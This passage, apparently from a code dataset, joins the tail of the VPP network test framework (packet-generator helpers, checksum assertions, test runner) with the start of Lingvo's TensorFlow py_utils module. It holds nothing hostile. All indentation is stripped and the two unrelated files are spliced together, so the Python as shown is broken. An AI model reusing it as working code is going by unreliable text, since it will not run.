super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
@classmethod
def get_vpp_time(cls):
return float(cls.vapi.cli('show clock').replace("Time now ", ""))
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls):
""" Enable the PG, wait till it is done, then clean up """
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for stamp, cap_name in cls._captures:
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(layer, cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics.get_err_counter(counter)
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
if hasattr(cls, 'logger'):
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if hasattr(cls, 'logger') and after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
if hasattr(cls, 'logger'):
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts):
self.vapi.cli("clear trace")
intf.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts)
rx = output.get_capture(n_rx)
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def runTest(self):
""" unittest calls runTest when TestCase is instantiated without a
test case. Use case: Writing unittests against VppTestCase"""
pass
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
if self.current_test_case_info.logger:
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
if self.current_test_case_info.logger:
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
if self.current_test_case_info.logger:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(colorize(getdoc(test).splitlines()[0], GREEN))
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, args, logger, env=None):
self.logger = logger
self.args = args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
super(Worker, self).__init__()
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
py_utils.py | # Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
if py_utils_flags.enable_asserts():
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
x = tf.convert_to_tensor(x)
l = tf.cast(tf.convert_to_tensor(l), x.dtype)
r = tf.cast(tf.convert_to_tensor(r), x.dtype)
return tf.group([
assert_greater_equal(x, l, *args, **kwargs),
assert_less(x, r, *args, **kwargs)
])
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
"""Asserts shape expected_ids_shape_pattern matches all other input shapes."""
def AssertFn(inputs):
dependencies = [
assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
] + [
assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
]
return with_dependencies(dependencies, inputs.ids_shape)
inputs = NestedMap(
expected_ids_shape_pattern=expected_ids_shape_pattern,
ids_shape=ids_shape,
args=args)
return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
x_name = x.name if not tf.executing_eagerly() else '[eager]'
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x_name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x_name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not py_utils_flags.enable_check_numerics():
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
def _VarInCollection(var, collection):
"""Return whether a variable `var` is in the given variable collection."""
# We use variable reference for comparison, since variable is not hashable in
# eager mode.
return var.ref() in [v.ref() for v in collection]
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
try:
yield
finally:
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
enabled: To enable the debugging.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
if match:
caller_var = match.groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
